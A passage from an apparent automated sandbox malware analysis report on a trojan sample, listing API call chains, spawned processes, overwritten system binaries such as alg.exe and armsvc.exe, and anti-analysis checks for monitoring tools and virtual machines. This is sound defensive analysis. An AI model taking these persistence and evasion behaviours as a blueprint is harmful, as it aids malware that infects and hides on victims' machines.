          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03443D403_2_03443D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F1D5A3_2_034F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F7D733_2_034F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345FDC03_2_0345FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B9C323_2_034B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFCF23_2_034FFCF2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 111 times
          Source: UaOJAOMxcU.exe, 00000000.00000003.2054328632.0000000004363000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2053478809.0000000004ECD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2046585509.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2041241627.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: UaOJAOMxcU.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: UaOJAOMxcU.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@5/8@2/1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046A06A GetLastError,FormatMessageW
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Users\user\AppData\Roaming\68325cf9c814f3fc.bin
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68325cf9c814f3fc-inf
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68325cf9c814f3fc73779169-b
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Users\user\AppData\Local\Temp\aut8008.tmp
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: UaOJAOMxcU.exe | Virustotal: Detection: 78%
          Source: UaOJAOMxcU.exe | ReversingLabs: Detection: 95%
          Source: unknown | Process created: C:\Users\user\Desktop\UaOJAOMxcU.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"
          Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"
          Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Section loaded: webio.dll
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
          Source: UaOJAOMxcU.exe | Static file information: File size 1777664 > 1048576
          Source: UaOJAOMxcU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2041180877.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: alg.exe.0.dr | Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress
          Source: AppVClient.exe.0.dr | Static PE information: real checksum: 0xcd10f should be: 0x14e6ee
          Source: armsvc.exe.0.dr | Static PE information: section name: .didat
          Source: alg.exe.0.dr | Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00428945 push ecx; ret 0_2_00428958
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00402F12 push es; retf 0_2_00402F13
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB0CAh; ret 0_2_00AEB061
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB30Dh; ret 0_2_00AEB1E6
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB2F2h; ret 0_2_00AEB262
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB255h; ret 0_2_00AEB2ED
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB2D0h; ret 0_2_00AEB346
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AEB180 push 00AEB37Fh; ret 0_2_00AEB3B7
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AE520C push 00AE528Fh; ret 0_2_00AE522D
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0852Eh; ret 0_2_00B07F3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08514h; ret 0_2_00B07F66
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B07E66h; ret 0_2_00B08057
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0817Ah; ret 0_2_00B0808B
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B082E5h; ret 0_2_00B080D9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0826Ah; ret 0_2_00B0819E
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0849Ch; ret 0_2_00B081E4
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0805Ch; ret 0_2_00B08255
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08321h; ret 0_2_00B082E0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B07FBFh; ret 0_2_00B0831F
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B07FA8h; ret 0_2_00B0834C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B084BAh; ret 0_2_00B083E2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08426h; ret 0_2_00B084D8
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08075h; ret 0_2_00B084FD
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0808Ch; ret 0_2_00B08512
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08B6Fh; ret 0_2_00B08596
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08E94h; ret 0_2_00B085C9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B0878Bh; ret 0_2_00B08734
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08D45h; ret 0_2_00B087D3
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08E5Fh; ret 0_2_00B0885F
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08AB5h; ret 0_2_00B08B13
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B08550 push 00B08784h; ret 0_2_00B08CA1
          Source: UaOJAOMxcU.exe | Static PE information: section name: .reloc entropy: 7.938045915639303
          Source: AppVClient.exe.0.dr | Static PE information: section name: .reloc entropy: 7.94302526305403

          Persistence and Installation Behavior

          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | File created: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | API/Special instruction interceptor: Address: C30C84
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXERG
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0347096E rdtsc
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-111725
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | API coverage: 4.9 %
          Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe TID: 892 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6156 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | API call chain: ExitProcess graph end node graph_0-109613
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | API call chain: ExitProcess graph end node graph_0-109271
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0347096E rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00417D33 LdrLoadDll
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00473F09 BlockInput
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00AE1130 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00B23F3D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00C2F8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00C30EF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00C30F50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
